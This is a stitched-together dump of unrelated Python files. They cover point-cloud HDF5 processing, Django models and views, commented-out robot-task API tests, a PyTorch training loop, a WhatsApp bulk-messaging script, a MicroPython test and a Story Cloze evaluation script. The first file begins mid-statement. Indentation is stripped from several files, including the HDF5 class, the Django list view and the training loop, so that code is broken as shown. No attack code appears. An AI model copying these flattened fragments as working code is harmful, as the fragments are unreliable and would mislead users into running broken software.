'color':np.uint8,'label_category':np.uint32,'label_instance':np.int32,\
'label_material':np.int32, 'label_mesh':np.int32, 'label_raw_category':np.int32 }
num_channels = {'xyz':3,'nxnynz':3,'intensity':1,'color':3,'label_category':1,\
'label_instance':1,'label_material':1,'label_mesh':1, 'label_raw_category':1}
def __init__(self,raw_h5_f,file_name,datasource_name=None):
self.h5f = raw_h5_f
if datasource_name == None:
assert 'datasource_name' in self.h5f.attrs
else:
self.h5f.attrs['datasource_name'] = datasource_name
assert self.h5f.attrs['datasource_name'] in DATA_SOURCE_NAME_LIST
self.datasource_name = self.h5f.attrs['datasource_name']
self.dataset_meta = DatasetsMeta(self.datasource_name)
self.get_summary_info()
self.file_name = file_name
self.num_default_row = 0
def show_h5f_summary_info(self):
print('\n\nsummary of file: ',self.file_name)
return show_h5f_summary_info(self.h5f)
def set_num_default_row(self,N):
self.num_default_row = N
def get_dataset(self,data_name):
if data_name in self.h5f:
return self.h5f[data_name]
assert(data_name in self.dtypes)
nc = self.num_channels[data_name]
dset = self.h5f.create_dataset(data_name,shape=(self.num_default_row,nc),\
maxshape=(None,nc),dtype=self.dtypes[data_name],\
chunks = (self.h5_num_row_1M,nc),\
compression = "gzip")
dset.attrs['valid_num'] = 0
setattr(self,data_name+'_dset',dset)
if 'element_names' not in self.h5f.attrs:
self.h5f.attrs['element_names'] = [data_name]
else:
self.h5f.attrs['element_names'] = [data_name]+[e for e in self.h5f.attrs['element_names']]
return dset
def get_total_num_channels_name_list(self):
total_num_channels = 0
data_name_list = [str(dn) for dn in self.h5f]
for dn in data_name_list:
total_num_channels += self.num_channels[dn]
return total_num_channels,data_name_list
def append_to_dset(self,dset_name,new_data):
self.add_to_dset(dset_name,new_data,None,None)
def get_all_dsets(self,start_idx,end_idx):
out_dset_order = ['xyz','color','label','intensity']
data_list = []
for dset_name in out_dset_order:
if dset_name in self.h5f:
data_k = self.h5f[dset_name][start_idx:end_idx,:]
data_list.append(data_k)
data = np.concatenate(data_list,1)
return data
def add_to_dset(self,dset_name,new_data,start,end):
dset = self.get_dataset(dset_name)
assert dset.ndim == new_data.ndim
valid_n = dset.attrs['valid_num']
if start == None:
start = valid_n
end = start + new_data.shape[0]
if dset.shape[0] < end:
dset.resize((end,)+dset.shape[1:])
if valid_n < end:
dset.attrs['valid_num'] = end
if new_data.ndim==1 and dset.ndim==2 and dset.shape[1]==1:
new_data = np.expand_dims(new_data,1)
dset[start:end,:] = new_data
def rm_invalid(self):
for dset_name in self.h5f:
dset = self.h5f[dset_name]
if 'valid_num' in dset.attrs:
valid_num = dset.attrs['valid_num']
if valid_num < dset.shape[0]:
dset.resize( (valid_num,)+dset.shape[1:] )
def get_summary_info(self):
for dset_name in self.h5f:
setattr(self,dset_name+'_dset',self.h5f[dset_name])
if 'xyz' in self.h5f:
self.total_row_N = self.xyz_dset.shape[0]
self.xyz_max = self.xyz_dset.attrs['max']
self.xyz_min = self.xyz_dset.attrs['min']
self.xyz_scope = self.xyz_max - self.xyz_min
def generate_objfile(self,obj_file_name=None,IsLabelColor=False,xyz_cut_rate=None):
if obj_file_name==None:
base_fn = os.path.basename(self.file_name)
base_fn = os.path.splitext(base_fn)[0]
folder_path = os.path.dirname(self.file_name)
obj_folder = os.path.join(folder_path,'obj/'+base_fn)
print('obj_folder:',obj_folder)
obj_file_name_nocolor = os.path.join(obj_folder,base_fn+'_xyz.obj')
if IsLabelColor:
base_fn = base_fn + '_TrueLabel'
obj_file_name = os.path.join(obj_folder,base_fn+'.obj')
if not os.path.exists(obj_folder):
os.makedirs(obj_folder)
print('automatic obj file name: %s'%(obj_file_name))
with open(obj_file_name,'w') as out_obj_file:
with open(obj_file_name_nocolor,'w') as xyz_obj_file:
xyz_dset = self.xyz_dset
if 'color' in self.h5f:
color_dset = self.color_dset
else:
if 'label_category' in self.h5f:
IsLabelColor = True
if IsLabelColor:
label_category_dset = self.label_category_dset
if xyz_cut_rate != None:
# when rate < 0.5: cut small
# when rate >0.5: cut big
xyz_max = np.array([ np.max(xyz_dset[:,i]) for i in range(3) ])
xyz_min = np.array([ np.min(xyz_dset[:,i]) for i in range(3) ])
xyz_scope = xyz_max - xyz_min
xyz_thres = xyz_scope * xyz_cut_rate + xyz_min
print('xyz_thres = ',str(xyz_thres))
cut_num = 0
row_step = self.h5_num_row_1M * 10
row_N = xyz_dset.shape[0]
for k in range(0,row_N,row_step):
end = min(k+row_step,row_N)
xyz_buf_k = xyz_dset[k:end,:]
if 'color' in self.h5f:
color_buf_k = color_dset[k:end,:]
buf_k = np.hstack((xyz_buf_k,color_buf_k))
else:
buf_k = xyz_buf_k
if IsLabelColor:
label_k = label_category_dset[k:end,0]
for j in range(0,buf_k.shape[0]):
is_cut_this_point = False
if xyz_cut_rate!=None:
# cut by position
for xyz_j in range(3):
if (xyz_cut_rate[xyz_j] >0.5 and buf_k[j,xyz_j] > xyz_thres[xyz_j]) or \
(xyz_cut_rate[xyz_j]<=0.5 and buf_k[j,xyz_j] < xyz_thres[xyz_j]):
is_cut_this_point = True
if is_cut_this_point:
cut_num += 1
continue
if not IsLabelColor:
str_j = 'v ' + '\t'.join( ['%0.5f'%(d) for d in buf_k[j,0:3]]) + ' \t'\
+ '\t'.join( ['%d'%(d) for d in buf_k[j,3:6]]) + '\n'
else:
label = label_k[j]
label_color = self.dataset_meta.label2color[label]
str_j = 'v ' + '\t'.join( ['%0.5f'%(d) for d in buf_k[j,0:3]]) + ' \t'\
+ '\t'.join( ['%d'%(d) for d in label_color ]) + '\n'
nocolor_str_j = 'v ' + '\t'.join( ['%0.5f'%(d) for d in buf_k[j,0:3]]) + ' \n'
out_obj_file.write(str_j)
xyz_obj_file.write(nocolor_str_j)
print('gen raw obj: %s'%(obj_file_name,))
def rh5_create_done(self):
self.rm_invalid()
self.add_geometric_scope()
self.write_raw_summary()
#self.show_h5f_summary_info()
def write_raw_summary(self):
summary_fn = os.path.splitext( self.file_name )[0]+'.txt'
with open(summary_fn,'w') as summary_f:
summary_f.write( self.show_h5f_summary_info() )
def add_geometric_scope(self,line_num_limit=None):
''' calculate the geometric scope of raw h5 data, and add the result to attrs of dset'''
#begin = time.time()
max_xyz = -np.ones((3))*1e10
min_xyz = np.ones((3))*1e10
xyz_dset = self.xyz_dset
row_step = self.h5_num_row_1M
print('File: %s %d lines'\
%(os.path.basename(self.file_name),xyz_dset.shape[0]) )
#print('read row step = %d'%(row_step))
for k in range(0,xyz_dset.shape[0],row_step):
end = min(k+row_step,xyz_dset.shape[0])
xyz_buf = xyz_dset[k:end,:]
xyz_buf_max = xyz_buf.max(axis=0)
xyz_buf_min = xyz_buf.min(axis=0)
max_xyz = np.maximum(max_xyz,xyz_buf_max)
min_xyz = np.minimum(min_xyz,xyz_buf_min)
if line_num_limit!=None and k > line_num_limit:
print('break at k = ',line_num_limit)
break
xyz_dset.attrs['max'] = max_xyz
xyz_dset.attrs['min'] = min_xyz
self.h5f.attrs['xyz_max'] = max_xyz
self.h5f.attrs['xyz_min'] = min_xyz
max_str = ' '.join([ str(e) for e in max_xyz ])
min_str = ' '.join([ str(e) for e in min_xyz ])
print('max_str=%s\tmin_str=%s'%(max_str,min_str) )
#print('T=',time.time()-begin)
@staticmethod
def check_rh5_intact( file_name ):
f_format = os.path.splitext(file_name)[-1]
assert f_format == '.rh5'
if not os.path.exists(file_name):
return False, "%s not exist"%(file_name)
#if os.path.getsize( file_name ) / 1000.0 < 100:
# return False,"file too small < 20 K"
file_type = magic.from_file(file_name)
if "Hierarchical Data Format" not in file_type:
return False,"File signature err"
with h5py.File(file_name,'r') as h5f:
attrs_to_check = ['xyz_max','xyz_min']
for attrs in attrs_to_check:
if attrs not in h5f.attrs:
return False, "%s not in %s"%(attrs,file_name)
return True,""
def Write_all_file_accuracies(normed_h5f_file_list=None,out_path=None,pre_out_fn=''):
if normed_h5f_file_list == None:
normed_h5f_file_list = glob.glob( GLOBAL_PARA.stanford_indoor3d_globalnormedh5_stride_0d5_step_1_4096 +
'/Area_2_office_1*' )
if out_path == None: out_path = os.path.join(GLOBAL_PARA.stanford_indoor3d_globalnormedh5_stride_0d5_step_1_4096,
'pred_accuracy')
if not os.path.exists(out_path):
os.makedirs(out_path)
all_acc_fn = os.path.join(out_path,pre_out_fn+'accuracies.txt')
all_ave_acc_fn = os.path.join(out_path,pre_out_fn+'average_accuracies.txt')
class_TP = class_FN = class_FP = np.zeros(shape=(len(Normed_H5f.g_class2label)))
total_num = 0
average_class_accu_ls = []
with open(all_acc_fn,'w') as all_acc_f,open(all_ave_acc_fn,'w') as all_ave_acc_f:
for i,fn in enumerate(normed_h5f_file_list):
h5f = h5py.File(fn,'r')
norm_h5f = Normed_H5f(h5f,fn)
class_TP_i,class_FN_i,class_FP_i,total_num_i,acc_str_i,ave_acc_str_i = norm_h5f.Get_file_accuracies(
IsWrite=False, out_path = out_path)
class_TP = class_TP_i + class_TP
class_FN = class_FN_i + class_FN
class_FP = class_FP_i + class_FP
total_num = total_num_i + total_num
if acc_str_i != '':
all_acc_f.write('File: '+os.path.basename(fn)+'\n')
all_acc_f.write(acc_str_i+'\n')
all_ave_acc_f.write(ave_acc_str_i+'\t: '+os.path.basename(fn)+'\n')
acc_str,ave_acc_str = Normed_H5f.cal_accuracy(class_TP,class_FN,class_FP,total_num)
ave_str = 'Throughout All %d files.\n'%(i+1) + acc_str
all_acc_f.write('\n'+ave_str)
all_ave_acc_f.write('\n'+ave_str)
print('accuracy file: '+all_acc_fn)
print('average accuracy file: '+all_ave_acc_fn)
return ave_str,out_path,class_TP,class_FN,class_FP,total_num
def Write_Area_accuracies():
ave_str_areas = ''
class_TP = class_FN = class_FP = np.zeros(shape=(len(Normed_H5f.g_class2label)))
total_num = 0
for i in range(6):
glob_i = 'Area_%d'%(i+1)
normed_h5f_file_list = glob.glob( os.path.join(GLOBAL_PARA.stanford_indoor3d_globalnormedh5_stride_0d5_step_1_4096,
glob_i+'*') )
ave_str,out_path,class_TP_i,class_FN_i,class_FP_i,total_num_i = Write_all_file_accuracies(normed_h5f_file_list,pre_out_fn=glob_i+'_')
class_TP = class_TP_i + class_TP
class_FN = class_FN_i + class_FN
class_FP = class_FP_i + class_FP
total_num = total_num_i + total_num
ave_str_areas += '\nArea%d\n'%i
ave_str_areas += ave_str
acc_str,ave_acc_str = Normed_H5f.cal_accuracy(class_TP,class_FN,class_FP,total_num)
all_area_str = '\nThrough %d areas.\n'%(i+1)+acc_str
with open(os.path.join(out_path,'areas_accuracies.txt'),'w' ) as area_acc_f:
area_acc_f.write(ave_str_areas)
area_acc_f.write(all_area_str)
#-------------------------------------------------------------------------------
# Test above codes
#-------------------------------------------------------------------------------
def main(file_list):
outdoor_prep = MAIN_DATA_PREP()
actions = ['merge','sample_merged','obj_sampled_merged','norm_sampled_merged']
actions = ['merge','sample_merged','norm_sampled_merged']
outdoor_prep.main(file_list,actions,sample_num=4096,sample_method='random',\
stride=[8,8,-1],step=[8,8,-1])
#outdoor_prep.Do_sort_to_blocks()
#Do_extract_part_area()
#outdoor_prep.test_sub_block_ks()
#outdoor_prep.DO_add_geometric_scope_file()
#outdoor_prep.DO_gen_rawETH_to_h5()
def show_h5f_file():
fn = '/home/y/Research/dynamic_pointnet/data/Matterport3D_H5F/v1/scans/17DRP5sb8fy/stride_0d1_step_0d1/region2.sh5'
fn = '/home/y/DS/Matterport3D/Matterport3D_H5F/v1/scans/17DRP5sb8fy/stride_0d1_step_0d1_pyramid-1_2-512_128_64_16-0d2_0d4_0d8_16/region2.prh5'
with h5py.File(fn,'r') as h5f:
show_h5f_summary_info(h5f)
if __name__ == '__main__':
START_T = time.time()
Do_extract_part_area()
T = time.time() - START_T
print('exit main, T = ',T)

# -----------------------------------------------------------------------------
# Next source file: Django models for a simple polls app.
# -----------------------------------------------------------------------------
from django.db import models


class Question(models.Model):
    question_text = models.CharField(max_length=200, unique=True, null=False)
    pub_date = models.DateTimeField()

    def __str__(self):
        return 'Question: %s' % self.question_text


class Choice(models.Model):
    choice_text = models.CharField(max_length=200, null=False)
    votes = models.IntegerField(default=0)
    question = models.ForeignKey(Question, on_delete=models.CASCADE)

    def __str__(self):
        return '%s => %s' % (self.question, self.choice_text)
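
# Hedged usage sketch (added, not in the original file):
#
#   q = Question.objects.create(question_text="What's new?", pub_date=timezone.now())
#   q.choice_set.create(choice_text="Not much", votes=0)
#
# (`timezone` would come from django.utils; it is shown here only for
# illustration.)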

# -----------------------------------------------------------------------------
# Next source file: an auto-generated Django migration.
# -----------------------------------------------------------------------------
# Generated by Django 3.1.5 on 2021-01-25 16:24
from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ('app', '0002_auto_20210124_0610'),
    ]

    operations = [
        migrations.RenameModel(
            old_name='Parent',
            new_name='Account',
        ),
    ]

# -----------------------------------------------------------------------------
# Next source file: a Django list view for a product-category page.
# -----------------------------------------------------------------------------
from django.shortcuts import render
from django.views.generic import View
from .models import GoodsCategory
from meiduo_mall.utils.category import get_category
# pagination
from django.core.paginator import Paginator
# Create your views here.
class ListView(View):
def get(self, request, category_id, page_num):
# 查询当前指定分类对象
try:
category3 = GoodsCategory.objects.get(pk=category_id)
except:
return render(request, '404.html')
categories=get_category()
category2=category3.parent
category1=category2.parent
breadcrumb={
'cat1':{
'name':category1.name,
'url':category1.goodchannel_set.all()[0].url
},
'cat2':category2,
'cat3':category3
}
skus=category3.sku_set.filter(is_launched=True)
sort = request.GET.get('sort', 'default')
# price
if sort == 'price':
    skus = skus.order_by('price')
# popularity
elif sort == 'hot':
    skus = skus.order_by('-sales')
# default
else:
    skus = skus.order_by('-id')
# how many records per page
paginator = Paginator(skus, 5)
# fetch the requested page of records
page_skus = paginator.page(page_num)
context={'categories':categories,
'breadcrumb':breadcrumb,
'sort':sort,
'page_skus':page_skus,
'category':category3
}
return render(request, 'list.html',context)
| StarcoderdataPython |
1643679 | <reponame>baviera08/romi-dashboard
# import asyncio
# import concurrent.futures
# from rmf_task_msgs.msg import TaskSummary as RmfTaskSummary
# from rmf_task_msgs.msg import TaskType as RmfTaskType
# from rmf_task_msgs.srv import CancelTask as RmfCancelTask
# from rmf_task_msgs.srv import SubmitTask as RmfSubmitTask
# from ...models import CancelTask, CleanTaskDescription, SubmitTask, TaskSummary
# from ...models import tortoise_models as ttm
# from ..test_fixtures import RouteFixture
# class TestTasksRoute(RouteFixture):
# def test_submit_task_request(self):
# # create a submit task request message
# task = SubmitTask(
# task_type=RmfTaskType.TYPE_CLEAN,
# start_time=0,
# description=CleanTaskDescription(cleaning_zone="zone_2"),
# priority=0,
# )
# fut = self.host_service_one(
# RmfSubmitTask, "submit_task", RmfSubmitTask.Response(success=True)
# )
# resp = self.session.post(f"{self.base_url}/tasks/submit_task", data=task.json())
# self.assertEqual(resp.status_code, 200)
# ros_received: RmfSubmitTask.Request = fut.result(3)
# self.assertEqual(ros_received.requester, "rmf_server")
# def test_cancel_task_request(self):
# cancel_task = CancelTask(task_id="test_task")
# fut = self.host_service_one(
# RmfCancelTask, "cancel_task", RmfCancelTask.Response(success=True)
# )
# resp = self.session.post(
# f"{self.base_url}/tasks/cancel_task", data=cancel_task.json()
# )
# self.assertEqual(resp.status_code, 200)
# received: RmfCancelTask.Request = fut.result(3)
# self.assertEqual(received.task_id, "test_task")
# def test_cancel_task_failure(self):
# cancel_task = CancelTask(task_id="test_task")
# fut = self.host_service_one(
# RmfCancelTask,
# "cancel_task",
# RmfCancelTask.Response(success=False, message="test error"),
# )
# resp = self.session.post(
# f"{self.base_url}/tasks/cancel_task", data=cancel_task.json()
# )
# self.assertEqual(resp.status_code, 500)
# fut.result(3)
# self.assertEqual(resp.json()["detail"], "test error")
# def test_query_tasks(self):
# dataset = [
# TaskSummary(
# task_id="task_1",
# fleet_name="fleet_1",
# submission_time={"sec": 1000, "nanosec": 0},
# start_time={"sec": 2000, "nanosec": 0},
# end_time={"sec": 3000, "nanosec": 0},
# robot_name="robot_1",
# state=RmfTaskSummary.STATE_COMPLETED,
# task_profile={
# "description": {
# "task_type": {"type": RmfTaskType.TYPE_LOOP},
# "priority": {"value": 0},
# }
# },
# ),
# TaskSummary(
# task_id="task_2",
# fleet_name="fleet_2",
# submission_time={"sec": 4000, "nanosec": 0},
# start_time={"sec": 5000, "nanosec": 0},
# end_time={"sec": 6000, "nanosec": 0},
# robot_name="robot_2",
# state=RmfTaskSummary.STATE_ACTIVE,
# task_profile={
# "description": {
# "task_type": {"type": RmfTaskType.TYPE_DELIVERY},
# "priority": {"value": 1},
# }
# },
# ),
# ]
# fut = concurrent.futures.Future()
# async def save_data():
# fut.set_result(
# await asyncio.gather(
# *(ttm.TaskSummary.save_pydantic(data) for data in dataset)
# )
# )
# self.server.app.wait_ready()
# self.server.app.loop.create_task(save_data())
# fut.result()
# resp = self.session.get(f"{self.base_url}/tasks?task_id=task_1,task_2")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 2)
# resp = self.session.get(f"{self.base_url}/tasks?fleet_name=fleet_1")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_1")
# self.assertEqual(items[0]["task_summary"]["fleet_name"], "fleet_1")
# resp = self.session.get(f"{self.base_url}/tasks?robot_name=robot_1")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_1")
# self.assertEqual(items[0]["task_summary"]["robot_name"], "robot_1")
# resp = self.session.get(f"{self.base_url}/tasks?state=completed")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_1")
# self.assertEqual(
# items[0]["task_summary"]["state"], RmfTaskSummary.STATE_COMPLETED
# )
# resp = self.session.get(f"{self.base_url}/tasks?task_type=loop")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_1")
# self.assertEqual(
# items[0]["task_summary"]["task_profile"]["description"]["task_type"][
# "type"
# ],
# RmfTaskType.TYPE_LOOP,
# )
# resp = self.session.get(f"{self.base_url}/tasks?priority=0")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_1")
# resp = self.session.get(f"{self.base_url}/tasks?submission_time_since=4000")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_2")
# resp = self.session.get(f"{self.base_url}/tasks?start_time_since=5000")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_2")
# resp = self.session.get(f"{self.base_url}/tasks?end_time_since=6000")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_2")
# # test no match
# resp = self.session.get(
# f"{self.base_url}/tasks?fleet_name=fleet_1&start_time_since=5000"
# )
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 0)
# # no query returns everything
# resp = self.session.get(f"{self.base_url}/tasks")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 2)
# def test_get_task_summary(self):
# dataset = [
# TaskSummary(
# task_id="task_1",
# fleet_name="fleet_1",
# submission_time={"sec": 1000, "nanosec": 0},
# start_time={"sec": 2000, "nanosec": 0},
# end_time={"sec": 3000, "nanosec": 0},
# robot_name="robot_1",
# state=RmfTaskSummary.STATE_COMPLETED,
# task_profile={
# "description": {
# "task_type": {"type": RmfTaskType.TYPE_LOOP},
# "priority": {"value": 0},
# }
# },
# ),
# ]
# fut = concurrent.futures.Future()
# async def save_data():
# fut.set_result(
# await asyncio.gather(
# *(ttm.TaskSummary.save_pydantic(data) for data in dataset)
# )
# )
# self.server.app.wait_ready()
# self.server.app.loop.create_task(save_data())
# fut.result()
# resp = self.session.get(f"{self.base_url}/tasks/task_1/summary")
# self.assertEqual(200, resp.status_code)
# resp_json = resp.json()
# self.assertEqual("task_1", resp_json["task_id"])
| StarcoderdataPython |
3331056 | <filename>train_model.py
import torch
from torch import optim, nn
from preprocess import preprocess_image
from utils import save_model
num_epochs = 10
log_step = 10
eval_step = 5
save_step = 5
# from vgg import model, feature_extracter
# from image_loader import image_loader
# loader = image_loader('/home/iacv/project/sketch/dataset/images/')
# model_train = model(feature_extracter,10)
def train(model_train, loader, gpu_flag,root_folder):
optimizer = optim.Adam(model_train.parameters())
criterion = nn.CrossEntropyLoss()
for epoch in range( num_epochs ):
for step, ( images, lables ) in enumerate( loader ):
images = preprocess_image( array = images,
split_type = 'train',
use_gpu = gpu_flag )
lables = torch.tensor(lables)
if(gpu_flag == True):
lables = lables.cuda()
optimizer.zero_grad()
preds = model_train( images )
loss = criterion( preds, lables )
loss.backward()
optimizer.step()
# print step info
if ((step + 1) % log_step == 0):
print("Epoch [{}/{}] Step [{}/{}]: loss={}"
.format(epoch + 1,
num_epochs,
step + 1,
loader.size['train'],
loss.data.item()))
# # eval model on validation set
# if ((epoch + 1) % eval_step == 0):
# eval_src(source_encoder, source_classifier, data_loader)
# save model parameters
if ((epoch + 1) % save_step == 0):
save_model( model_train, model_train.name + "-{}.pt".format(epoch + 1),root_folder)
# save final model
save_model(model_train, model_train.name + "-final.pt", root_folder)
return model_train

# -----------------------------------------------------------------------------
# Next source file: a WhatsApp bulk-message helper script.
# -----------------------------------------------------------------------------
"""
This script helps you send automated messages on WhatsApp.
Provide a .csv or .xls* file containing phone numbers in a column to send the
same message to all of them.
Make sure that the country/area code is included in your
numbers, otherwise the message will not be delivered.
Note: the script takes some time to send each message because of the
delay built into the pywhatkit library. If you are going to send a lot of
messages, it is best to leave the script running, since it
will take a while.
"""
import warnings
import pandas as pd
import re
import pywhatkit as kit
import os
import pyautogui
from datetime import datetime as dt, timedelta
from time import sleep
warnings.filterwarnings('ignore')
def warning_print(string):
print('\033[1;31;40m' + string + '\033[0m') # Colors the terminal in red
def get_file():
file = input(r'Please, insert the .xls* or .csv file path that contains the phone numbers: ')
_, file_extension = os.path.splitext(file)
while not (os.path.exists(file)) or (file_extension[0:4] not in ['.csv', '.xls']):
if not os.path.exists(file):
warning_print(f'This file path does not exist in your system: "{file}". Try again.')
else:
warning_print(f'You must select a .csv or .xls* file. Try again.')
file = input(r'Please, insert the .xls* or .csv file path that contains the phone numbers: ')
_, file_extension = os.path.splitext(file)
return file, file_extension
def clean_number(number):
return re.sub(r'\D', '', number) # Removes all extra symbols in the number, like "(", ")", "-", "+"
def format_phone(number, country_code=''):
phone = str(number)
phone = clean_number(phone)
if country_code:
country_code = clean_number(country_code)
len_country_code = len(country_code)
if phone[:len_country_code] != country_code:
phone = country_code + phone
phone = '+' + phone
return phone
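# Worked example for format_phone above (illustrative digits only):
#   format_phone('(11) 98765-4321', country_code='+55')   # -> '+5511987654321'
# clean_number() strips the punctuation to '11987654321' and, because the '55'
# prefix is missing, the country code is prepended before the leading '+'.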
def get_numbers_from_file(file_name, file_extension):
    if file_extension == '.csv':
df = pd.read_csv(file_name)
else:
df = pd.read_excel(file_name)
df.columns = df.columns.str.upper()
columns = df.columns.to_list()
phone_column = input('Name of the phone column: ').upper()
while phone_column not in columns:
warning_print(f'There is no column "{phone_column}" in the file. Try again.')
print(f'Columns found in your file:\n{columns}\n')
phone_column = input('Name of the phone column: ').upper()
print()
country_code = input('Sometimes there are numbers without the country code.\nInform a number to '
'be used as default for the country code or press enter to skip: ')
phones = df[phone_column].dropna().apply(format_phone, country_code=country_code).to_list()
return phones
def get_message():
message = input('Message:\n')
while len(message) < 3:
warning_print('You need to type at least 3 characters in your message')
message = input('Message:\n')
print('Are you sure you want to send this message to every phone?\n'
f'"{message}"')
confirm = input('1 to confirm, 0 to type the message again: ')
while confirm not in ['0', '1']:
confirm = input('1 to confirm, 0 to type the message again: ')
confirm = int(confirm) # Only converted to int here to prevent typing alphabetic values in input
if not confirm:
return get_message()
else:
return message
def send_message(phones, message, verbose=False):
while len(phones) >= 1:
        now = dt.now()
        hour, minute = now.hour, now.minute + 2
        if minute >= 60:  # roll the schedule into the next hour so pywhatkit gets a valid time
            hour, minute = (hour + 1) % 24, minute - 60
if verbose:
print(f'Sending message to {phones[0]}...', end=' ')
        try: # In case there is no Whatsapp associated with the number
kit.sendwhatmsg(phone_no=phones[0], message=message, time_hour=hour, time_min=minute, wait_time=10)
sleep(5)
pyautogui.hotkey('ctrl', 'w')
print('Sent!')
except Exception:
print(f'An error has occurred and the message was not sent to {phones[0]}')
pass
del phones[0]
if __name__ == '__main__':
print('--- Whatsapp Automatic Messenger ---')
print('Welcome!')
print('*Before you start, make sure you are logged in https://web.whatsapp.com/\n')
file, file_extension = get_file()
numbers = get_numbers_from_file(file_name=file, file_extension=file_extension)
print(f'Your message will be sent to these following numbers:\n{numbers}')
print()
message = get_message()
print(message)
send_message(phones=numbers, message=message, verbose=True)
print('Finish!')
| StarcoderdataPython |
3253510 | <filename>ogip_spectra/__init__.py
from .ogip_spectrum_dataset import *
from .io_ogip import *
from .models import *
__all__ = [
"StandardOGIPDataset",
"StandardOGIPDatasetReader",
"XspecSpectralModel"
]
| StarcoderdataPython |
1606026 | # memoryview.init()
try:
memoryview.init
except:
print("SKIP")
raise SystemExit
buf = b"12345"
m = memoryview(buf, 1, 3)
print(list(m))
m.init(buf, -1, 100)
print(list(m))
m.init(buf, 200, -1)
print(list(m))
| StarcoderdataPython |
155502 | <reponame>egonrian/google-research
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Outputs the overall validation accuracy on the 2016 and 2018 validation sets.
Also outputs accuracy on train set and train-style valid set.
"""
import collections
import csv
import os
import re
import time
from absl import app
from absl import flags
from absl import logging
import gin
import gin.tf
import models
import rocstories_sentence_embeddings
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
import utils
gfile = tf.io.gfile
FLAGS = flags.FLAGS
flags.DEFINE_string('base_dir', '/tmp/model',
'Base directory containing checkpoints and .gin config.')
flags.DEFINE_string('checkpoint_name', None,
'Specific checkpoint to run one-time eval on. If set, '
'state of FLAGS.continuous is ignored.')
flags.DEFINE_string('output_dir', None,
'Directory in which to save evaluation results.')
flags.DEFINE_bool('continuous', False,
'If True, infintely loops over base_dir looking for new '
'checkpoints. If False, only loops once.')
flags.DEFINE_bool('sharded_eval', False,
'If True, break the dataset into shards and perform eval '
'separately on each. This is intended to be used to be able '
'to compute error bounds on accuracies.')
flags.DEFINE_float('timeout', 9600, 'If greater than 0, time out after this '
'many seconds.')
flags.DEFINE_string('data_dir', None, 'Where to look for TFDS datasets.')
tf.enable_v2_behavior()
METRICS_TO_SAVE = [
# Acc of predicting 5th sentence out of 2000 from valid set.
'valid_nolabel_acc',
# Acc of predicting 5th sentence out of 2000 from train set.
'train_subset_acc',
'valid_spring2016_acc', # Acc on 2016 Story Cloze task.
'valid_winter2018_acc', # Acc on 2018 Story Cloze task.
]
@gin.configurable('dataset')
def prepare_datasets(dataset_name=gin.REQUIRED,
shuffle_input_sentences=False,
num_eval_examples=2000,
batch_size=32):
"""Create batched, properly-formatted datasets from the TFDS datasets.
Args:
dataset_name: Name of TFDS dataset.
shuffle_input_sentences: Not used during evaluation, but arg still needed
for gin compatibility.
num_eval_examples: Number of examples to use during evaluation. For the
nolabel evaluation, this is also the number of distractors we choose
between.
batch_size: Batch size.
Returns:
A dictionary mapping from the dataset split to a Dataset object.
"""
del shuffle_input_sentences
splits_to_load = {
'valid_nolabel': 'train[:2%]',
'train_nolabel': 'train[2%:4%]',
'valid2018': rocstories_sentence_embeddings.VALIDATION_2018,
'valid2016': rocstories_sentence_embeddings.VALIDATION_2016}
datasets = tfds.load(
dataset_name,
data_dir=FLAGS.data_dir,
split=splits_to_load,
download=False)
emb_matrices = {}
valid_nolabel_ds = utils.build_train_style_dataset(
datasets['valid_nolabel'], batch_size, False,
num_examples=num_eval_examples, is_training=False)
datasets['valid_nolabel'], emb_matrices['valid_nolabel'] = valid_nolabel_ds
train_nolabel_ds = utils.build_train_style_dataset(
datasets['train_nolabel'], batch_size, False,
num_examples=num_eval_examples, is_training=False)
datasets['train_nolabel'], emb_matrices['train_nolabel'] = train_nolabel_ds
  # Convert official evaluation datasets to validation data format. There are no
  # embedding matrices involved here since the task has only two possible next
  # sentences to pick between for each example. Ignore num_eval_examples and use
  # the full datasets for these.
datasets['valid2018'] = utils.build_validation_dataset(
datasets['valid2018'])
datasets['valid2016'] = utils.build_validation_dataset(
datasets['valid2016'])
return datasets, emb_matrices
def eval_single_checkpoint(
ckpt_name, output_path, model, datasets, embedding_matrices):
"""Runs quantitative evaluation on a single checkpoint."""
if gfile.exists(output_path):
logging.info('Skipping already exists: "%s"', output_path)
return
